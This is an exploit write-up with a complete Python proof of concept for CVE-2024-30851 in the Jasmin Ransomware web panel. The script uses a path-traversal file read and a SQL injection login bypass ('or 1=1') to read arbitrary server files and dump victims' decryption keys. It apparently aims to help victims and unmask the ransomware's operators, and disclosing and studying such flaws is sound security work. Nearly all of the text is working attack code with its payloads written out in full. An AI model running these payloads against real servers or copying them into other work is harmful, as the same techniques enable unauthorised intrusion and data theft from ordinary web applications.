Jasmin Ransomware 1.1 Arbitrary File Read

# Exploit Title: Jasmin Ransomware arbitrary file read# Date: 2024-04-04# Exploit Author: @_chebuya# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware# Version: v1.1# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30851# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/mainimport requestsimport argparseimport osfrom bs4 import BeautifulSoupdef get_file(jasmin_url, filepath):    response = requests.get(        f'{jasmin_url}/download_file.php?file={filepath}',        allow_redirects=False    )    return response.textdef get_keys(jasmin_url):    headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',    }    data = "username=&password='+or+1%3D1+--+-&service=login"    login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)    cookies = login_req.cookies    list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)    soup = BeautifulSoup(list_req.text, 'html.parser')    rows = soup.find_all('tr')    print(f"Dumping decryption keys from {len(rows)-1} victims")    for row in rows:        data = row.find_all('td')        if len(data) == 0:            continue                username = data[1].get_text()        hostname = data[0].get_text()        filepath = data[7].find('a')['href'].split("=")[1]        print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")subparser = parser.add_subparsers(dest='subcommand')file_parser = subparser.add_parser("getfile", help="Read a file off the server")file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")args = parser.parse_args()if args.subcommand != None:    target_url = args.url.rstrip("/")if args.subcommand == "getkeys":    get_keys(target_url)elif args.subcommand == "getfile":    target_file = args.file.replace("\\", "/").replace("c:", "")    target_path = os.path.join("../../../../../../../../../", target_file)    print(get_file(target_url, target_path))else:    parser.print_help()